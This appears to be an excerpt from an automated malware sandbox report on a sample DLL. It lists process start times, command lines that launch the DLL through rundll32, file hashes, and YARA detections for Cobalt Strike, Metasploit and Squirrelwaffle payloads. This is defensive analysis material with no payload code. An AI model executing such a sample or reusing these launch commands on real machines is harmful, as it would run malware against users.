                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll'
                                          Imagebase:0x8d0000
                                          File size:116736 bytes
                                          MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, Author: Avast Threat Intel Team
                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, Author: Avast Threat Intel Team
                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000000.00000002.515938362.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: FireEye
                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: yara@s3c.za.net
                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: FireEye
                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: yara@s3c.za.net
                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:high

                                          General

                                          Start time:20:25:43
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                                          Imagebase:0x870000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:20:25:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                                          Imagebase:0x1010000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000003.00000000.253813077.0000000004590000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000003.00000002.284559646.0000000004590000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:high

                                          General

                                          Start time:20:25:48
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
                                          Imagebase:0xfe0000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >